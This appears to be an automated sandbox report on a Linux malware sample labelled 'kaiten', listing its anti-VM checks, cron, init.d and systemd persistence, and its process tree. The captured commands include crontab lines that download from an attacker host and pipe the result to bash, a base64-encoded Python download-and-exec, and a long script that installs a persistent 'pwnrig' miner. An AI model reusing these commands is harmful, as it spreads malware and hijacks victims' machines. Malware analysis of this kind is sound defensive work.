kaiten | 96a47e74c42f7cb2799ef064f413aeaeaf667662a3983b4e66556a827aa2481a

Processes:

bin.64grepgrepbin.64grepgrep

description	ioc	process
File opened for reading	/proc/cpuinfo	bin.64
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	bin.64
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	grep

Checks hardware identifiers (DMI) 1 TTPs 8 IoCs

Checks DMI information which indicate if the system is a virtual machine.

antivm

Virtualization/Sandbox Evasion

Processes:

bin.64bin.64

description	ioc	process
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	bin.64
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	bin.64
File opened for reading	/sys/devices/virtual/dmi/id/product_name	bin.64
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	bin.64
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	bin.64
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	bin.64
File opened for reading	/sys/devices/virtual/dmi/id/product_name	bin.64
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	bin.64

Creates/modifies Cron job 1 TTPs 15 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

persistence

Scheduled Task/Job

Processes:

teesedcrontabcrontabcrontabcrontabcrontab

description	ioc	process
File opened for modification	/etc/cron.hourly/pwnrig	tee
File opened for modification	/etc/cron.monthly/pwnrig	tee
File opened for modification	/etc/cron.weekly/pwnrig	tee
File opened for modification	/etc/cron.weekly/sedVM9D8G	sed
File opened for modification	/var/spool/cron/crontabs/tmp.9tob60	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.T4nqKV	crontab
File opened for modification	/etc/cron.d/pwnrig	tee
File opened for modification	/etc/cron.daily/pwnrig	tee
File opened for modification	/etc/cron.d/sedn6k6uK	sed
File opened for modification	/var/spool/cron/crontabs/tmp.lAHWI7	crontab
File opened for modification	/etc/cron.daily/sedTFT2VK	sed
File opened for modification	/etc/cron.hourly/sedQpqhUK	sed
File opened for modification	/etc/cron.monthly/sedHnDuhH	sed
File opened for modification	/var/spool/cron/crontabs/tmp.Pf2Sis	crontab
File opened for modification	/var/spool/cron/crontabs/tmp.FYiU5t	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Modifies init.d 1 TTPs 3 IoCs

Adds/modifies system service, likely for persistence.

persistence

Boot or Logon Autostart Execution

Processes:

teesedbin.elf

description	ioc	process
File opened for modification	/etc/init.d/pwnrig	tee
File opened for modification	/etc/init.d/sedAMNbQA	sed
File opened for modification	/etc/init.d/knlib	bin.elf

Modifies systemd 1 TTPs 3 IoCs

Adds/ modifies systemd service files. Likely to achieve persistence.

persistence

Boot or Logon Autostart Execution

Processes:

bin.elftee

description	ioc	process
File opened for modification	/etc/systemd/system/knlibe.service	bin.elf
File opened for modification	/lib/systemd/system/pwnrigl.service	tee
File opened for modification	/etc/systemd/system/pwnrige.service	tee

Reads CPU attributes 1 TTPs 12 IoCs

System Information Discovery

Processes:

bin.64pspsbin.64pspspsps

description	ioc	process
File opened for reading	/sys/devices/system/cpu/types	bin.64
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	bin.64
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	bin.64
File opened for reading	/sys/devices/system/cpu/possible	bin.64
File opened for reading	/sys/devices/system/cpu/types	bin.64
File opened for reading	/sys/devices/system/cpu/possible	bin.64
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps

Reads hardware information 1 TTPs 28 IoCs

Accesses system info like serial numbers, manufacturer names etc.

System Information Discovery

Processes:

bin.64bin.64

description	ioc	process
File opened for reading	/sys/devices/virtual/dmi/id/board_name	bin.64
File opened for reading	/sys/devices/virtual/dmi/id/chassis_vendor	bin.64
File opened for reading	/sys/devices/virtual/dmi/id/chassis_type	bin.64
File opened for reading	/sys/devices/virtual/dmi/id/chassis_asset_tag	bin.64
File opened for reading	/sys/devices/virtual/dmi/id/bios_date	bin.64
File opened for reading	/sys/devices/virtual/dmi/id/product_uuid	bin.64
File opened for reading	/sys/devices/virtual/dmi/id/chassis_version	bin.64
File opened for reading	/sys/devices/virtual/dmi/id/product_version	bin.64
File opened for reading	/sys/devices/virtual/dmi/id/board_serial	bin.64
File opened for reading	/sys/devices/virtual/dmi/id/board_name	bin.64
File opened for reading	/sys/devices/virtual/dmi/id/board_version	bin.64
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	bin.64
File opened for reading	/sys/devices/virtual/dmi/id/board_asset_tag	bin.64
File opened for reading	/sys/devices/virtual/dmi/id/chassis_vendor	bin.64
File opened for reading	/sys/devices/virtual/dmi/id/product_uuid	bin.64
File opened for reading	/sys/devices/virtual/dmi/id/product_serial	bin.64
File opened for reading	/sys/devices/virtual/dmi/id/chassis_serial	bin.64
File opened for reading	/sys/devices/virtual/dmi/id/product_serial	bin.64
File opened for reading	/sys/devices/virtual/dmi/id/board_asset_tag	bin.64
File opened for reading	/sys/devices/virtual/dmi/id/bios_date	bin.64
File opened for reading	/sys/devices/virtual/dmi/id/product_version	bin.64
File opened for reading	/sys/devices/virtual/dmi/id/board_version	bin.64
File opened for reading	/sys/devices/virtual/dmi/id/chassis_version	bin.64
File opened for reading	/sys/devices/virtual/dmi/id/chassis_type	bin.64
File opened for reading	/sys/devices/virtual/dmi/id/chassis_asset_tag	bin.64
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	bin.64
File opened for reading	/sys/devices/virtual/dmi/id/board_serial	bin.64
File opened for reading	/sys/devices/virtual/dmi/id/chassis_serial	bin.64

Writes file to system bin folder 1 TTPs 5 IoCs

Hijack Execution Flow

Processes:

bin.elfcpcpcpcp

description	ioc	process
File opened for modification	/bin/knlib	bin.elf
File opened for modification	/bin/bprofr	cp
File opened for modification	/bin/crondr	cp
File opened for modification	/bin/initdr	cp
File opened for modification	/bin/sysdr	cp

Enumerates kernel/hardware configuration 1 TTPs 64 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

Processes:

bin.64bin.64systemctlsystemctl

description	ioc	process
File opened for reading	/sys/bus/node/devices/node0/meminfo	bin.64
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/core_id	bin.64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/coherency_line_size	bin.64
File opened for reading	/sys/bus/node/devices/node0/meminfo	bin.64
File opened for reading	/sys/bus/node/devices/node0/access0/initiators/read_bandwidth	bin.64
File opened for reading	/sys/fs/cgroup/cpuset/cpuset.cpus	bin.64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/coherency_line_size	bin.64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index1/shared_cpu_map	bin.64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/shared_cpu_map	bin.64
File opened for reading	/sys/bus/node/devices/node0/access1/initiators	bin.64
File opened for reading	/sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67	systemctl
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets	bin.64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map	bin.64
File opened for reading	/sys/fs/cgroup/cpuset/cpuset.mems	bin.64
File opened for reading	/sys/bus/cpu/devices/cpu0/cpufreq/base_frequency	bin.64
File opened for reading	/sys/bus/node/devices/node0/access0/initiators/read_latency	bin.64
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/package_cpus	bin.64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/size	bin.64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map	bin.64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/type	bin.64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map	bin.64
File opened for reading	/sys/kernel/mm/hugepages	bin.64
File opened for reading	/sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67	systemctl
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/number_of_sets	bin.64
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/core_cpus	bin.64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets	bin.64
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/die_cpus	bin.64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets	bin.64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index1/type	bin.64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/coherency_line_size	bin.64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index1/type	bin.64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map	bin.64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/number_of_sets	bin.64
File opened for reading	/sys/bus/dax/devices/target_node	bin.64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/type	bin.64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/level	bin.64
File opened for reading	/sys/fs/cgroup/unified/cgroup.controllers	bin.64
File opened for reading	/sys/bus/node/devices/node0/access0/initiators/read_bandwidth	bin.64
File opened for reading	/sys/bus/node/devices/node0/hugepages	bin.64
File opened for reading	/sys/fs/cgroup/cpuset/cpuset.mems	bin.64
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/package_cpus	bin.64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/level	bin.64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/type	bin.64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/type	bin.64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/physical_line_partition	bin.64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index5/shared_cpu_map	bin.64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/physical_line_partition	bin.64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/level	bin.64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index6/shared_cpu_map	bin.64
File opened for reading	/sys/bus/node/devices/node0/cpumap	bin.64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/physical_line_partition	bin.64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/level	bin.64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/type	bin.64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index1/shared_cpu_map	bin.64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map	bin.64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/size	bin.64
File opened for reading	/sys/bus/node/devices/node0/access0/initiators/read_latency	bin.64
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/core_id	bin.64
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/physical_package_id	bin.64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size	bin.64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/size	bin.64
File opened for reading	/sys/bus/dax/devices	bin.64
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/level	bin.64
File opened for reading	/sys/bus/dax/devices/target_node	bin.64

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

Processes:

pspspspspsmkdirpssystemctl

description	ioc	process
File opened for reading	/proc/72/stat	ps
File opened for reading	/proc/75/cmdline	ps
File opened for reading	/proc/200/stat	ps
File opened for reading	/proc/2016/status	ps
File opened for reading	/proc/490/cmdline	ps
File opened for reading	/proc/1055/stat	ps
File opened for reading	/proc/2262/stat	ps
File opened for reading	/proc/2260/status	ps
File opened for reading	/proc/695/stat	ps
File opened for reading	/proc/18/status	ps
File opened for reading	/proc/1471/cmdline	ps
File opened for reading	/proc/102/status	ps
File opened for reading	/proc/17/cmdline	ps
File opened for reading	/proc/86/status	ps
File opened for reading	/proc/93/cmdline	ps
File opened for reading	/proc/1042/status	ps
File opened for reading	/proc/780/status	ps
File opened for reading	/proc/1122/status	ps
File opened for reading	/proc/522/status	ps
File opened for reading	/proc/2327/cmdline	ps
File opened for reading	/proc/2257/cmdline	ps
File opened for reading	/proc/168/status	ps
File opened for reading	/proc/filesystems	mkdir
File opened for reading	/proc/618/stat	ps
File opened for reading	/proc/619/cmdline	ps
File opened for reading	/proc/810/cmdline	ps
File opened for reading	/proc/75/status	ps
File opened for reading	/proc/502/stat	ps
File opened for reading	/proc/439/status	ps
File opened for reading	/proc/74/stat	ps
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/618/status	ps
File opened for reading	/proc/829/cmdline	ps
File opened for reading	/proc/785/cmdline	ps
File opened for reading	/proc/780/stat	ps
File opened for reading	/proc/785/cmdline	ps
File opened for reading	/proc/174/stat	ps
File opened for reading	/proc/490/cmdline	ps
File opened for reading	/proc/175/stat	ps
File opened for reading	/proc/92/cmdline	ps
File opened for reading	/proc/172/cmdline	ps
File opened for reading	/proc/85/cmdline	ps
File opened for reading	/proc/440/cmdline	ps
File opened for reading	/proc/2261/status	ps
File opened for reading	/proc/490/stat	ps
File opened for reading	/proc/2403/cmdline	ps
File opened for reading	/proc/676/status	ps
File opened for reading	/proc/159/stat	ps
File opened for reading	/proc/568/status	ps
File opened for reading	/proc/14/cmdline	ps
File opened for reading	/proc/950/stat	ps
File opened for reading	/proc/16/cmdline	ps
File opened for reading	/proc/763/status	ps
File opened for reading	/proc/676/stat	ps
File opened for reading	/proc/22/status	ps
File opened for reading	/proc/74/status	ps
File opened for reading	/proc/201/cmdline	ps
File opened for reading	/proc/sys/kernel/osrelease	ps
File opened for reading	/proc/522/cmdline	ps
File opened for reading	/proc/539/status	ps
File opened for reading	/proc/1611/cmdline	ps
File opened for reading	/proc/1305/stat	ps
File opened for reading	/proc/173/status	ps
File opened for reading	/proc/1615/status	ps

Writes file to tmp directory 8 IoCs

Malware often drops required files in the /tmp directory.

Processes:

shbin.64bin.elfbi.64

description	ioc	process
File opened for modification	/tmp/~/.bash_profile	sh
File opened for modification	/tmp/.lock	bin.64
File opened for modification	/tmp/bi.64	bin.elf
File opened for modification	/tmp/bin.64	bin.elf
File opened for modification	/tmp/.klibsystem4.lock	bin.elf
File opened for modification	/tmp/bin.64
File opened for modification	/tmp/bi.64
File opened for modification	/tmp/.bashirc	bi.64

GoLang User-Agent 15 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

Processes:

description	flow	ioc
HTTP User-Agent header	33	Go-http-client/1.1
HTTP User-Agent header	66	Go-http-client/1.1
HTTP User-Agent header	23	Go-http-client/1.1
HTTP User-Agent header	50	Go-http-client/1.1
HTTP User-Agent header	54	Go-http-client/1.1
HTTP User-Agent header	62	Go-http-client/1.1
HTTP User-Agent header	70	Go-http-client/1.1
HTTP User-Agent header	40	Go-http-client/1.1
HTTP User-Agent header	52	Go-http-client/1.1
HTTP User-Agent header	60	Go-http-client/1.1
HTTP User-Agent header	64	Go-http-client/1.1
HTTP User-Agent header	68	Go-http-client/1.1
HTTP User-Agent header	56	Go-http-client/1.1
HTTP User-Agent header	58	Go-http-client/1.1
HTTP User-Agent header	73	Go-http-client/1.1

/tmp/bin.elf
/tmp/bin.elf
1⤵
- Modifies init.d
- Modifies systemd
- Writes file to system bin folder
- Writes file to tmp directory
PID:1475
- /usr/bin/bash
  bash -c "rm -rf /etc/sysctl.conf ; echo fs.file-max = 2097152 > /etc/sysctl.conf ; sysctl -p ; ulimit -Hn ; ulimit -n 99999 -u 999999"
  2⤵
  PID:1495
- - /usr/bin/rm
    rm -rf /etc/sysctl.conf
    3⤵
    PID:1496
- - /usr/sbin/sysctl
    sysctl -p
    3⤵
    PID:1497
- /usr/bin/chattr
  chattr +ia /etc/init.d/knlib
  2⤵
  PID:1498
- /etc/init.d/knlib
  /etc/init.d/knlib start
  2⤵
  - Executes dropped EXE
  PID:1499
- - /usr/bin/cp
    cp -f -r -- /bin/knlib /bin/klibsystem4
    3⤵
    PID:1500
- - /usr/bin/rm
    rm -rf -- klibsystem4
    3⤵
    PID:1502
- - /usr/bin/nohup
    nohup ./klibsystem4
    3⤵
    PID:1501
- /usr/bin/chattr
  chattr +ia /etc/systemd/system/knlibe.service
  2⤵
  PID:1503
- /usr/bin/systemctl
  systemctl daemon-reload
  2⤵
  - Reads EFI boot settings
  PID:1505
- /usr/bin/systemctl
  systemctl enable knlibe.service
  2⤵
  - Reads EFI boot settings
  - Enumerates kernel/hardware configuration
  PID:1558
- /usr/bin/chattr
  chattr +ia /bin/knlib
  2⤵
  PID:1594
- /usr/bin/bash
  bash -c "echo '*/10 * * * * (curl -s http://dw.c4kdeliver.top:443/2.gif || wget -q -O - http://dw.c4kdeliver.top:443/2.gif || lwp-download http://dw.c4kdeliver.top:443/2.gif /tmp/2.gif) | bash -sh; bash /tmp/2.gif; rm -rf /tmp/2.gif; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDY6NDQzL2QucHkiKS5yZWFkKCkpJyB8fCBweXRob24yIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash' | crontab -"
  2⤵
  PID:2554
- - /usr/bin/crontab
    crontab -
    3⤵
    - Creates/modifies Cron job
    PID:2556
- /usr/bin/ss
  ss -ant
  2⤵
  PID:2557
- /usr/bin/ss
  ss -ant
  2⤵
  PID:2558
- /usr/bin/ss
  ss -ant
  2⤵
  PID:2559
- /usr/bin/bash
  bash -c "echo '*/10 * * * * (curl -s http://dw.c4kdeliver.top:443/2.gif || wget -q -O - http://dw.c4kdeliver.top:443/2.gif || lwp-download http://dw.c4kdeliver.top:443/2.gif /tmp/2.gif) | bash -sh; bash /tmp/2.gif; rm -rf /tmp/2.gif; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDY6NDQzL2QucHkiKS5yZWFkKCkpJyB8fCBweXRob24yIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash' | crontab -"
  2⤵
  PID:2567
- - /usr/bin/crontab
    crontab -
    3⤵
    - Creates/modifies Cron job
    PID:2569
- /usr/bin/ss
  ss -ant
  2⤵
  PID:2570
- /usr/bin/ss
  ss -ant
  2⤵
  PID:2571
- /usr/bin/ss
  ss -ant
  2⤵
  PID:2572

/usr/bin/klibsystem4
./klibsystem4
1⤵
PID:1501

/usr/bin/bash
bash -c "echo '*/10 * * * * (curl -s http://185.172.128.146:443/2.gif || wget -q -O - http://dw.c4kdeliver.top:443/2.gif || lwp-download http://dw.c4kdeliver.top:443/2.gif /tmp/2.gif) | bash -sh; bash /tmp/2.gif; rm -rf /tmp/2.gif; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDY6NDQzL2QucHkiKS5yZWFkKCkpJyB8fCBweXRob24yIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTcyLjEyOC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash' | crontab -"
1⤵
PID:2007
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:2009

/usr/bin/ss
ss -ant
1⤵
PID:2010

/usr/bin/nohup
nohup /tmp/bi.64 "&"
1⤵
PID:2013

/tmp/bi.64
/tmp/bi.64 "&"
1⤵
- Writes file to tmp directory
PID:2013

/usr/bin/ss
ss -ant
1⤵
PID:2015

/usr/bin/nohup
nohup /tmp/bin.64 -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d -pwn "&"
1⤵
PID:2016

/tmp/bin.64
/tmp/bin.64 -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d -pwn "&"
1⤵
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
PID:2016
- /bin/sh
  sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
  2⤵
  PID:2017
- - /usr/bin/whoami
    whoami
    3⤵
    PID:2028
- - /usr/bin/hostname
    hostname
    3⤵
    PID:2029
- - /usr/bin/grep
    grep -c "^processor" /proc/cpuinfo
    3⤵
    - Checks CPU configuration
    PID:2030
- /bin/sh
  sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
  2⤵
  PID:2046
- - /usr/bin/awk
    awk "/[zZ]/ && !a[\$2]++ {print \$2}"
    3⤵
    PID:2048
- - /usr/bin/ps
    ps -A "-ostat,ppid"
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:2047
- - /usr/bin/id
    id -u
    3⤵
    PID:2050
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2053
- - /usr/bin/grep
    grep /etc/cron
    3⤵
    PID:2052
- - /usr/bin/ps
    ps x
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:2051
- /bin/sh
  sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/bin.64';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 443 -tls -dp 80 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 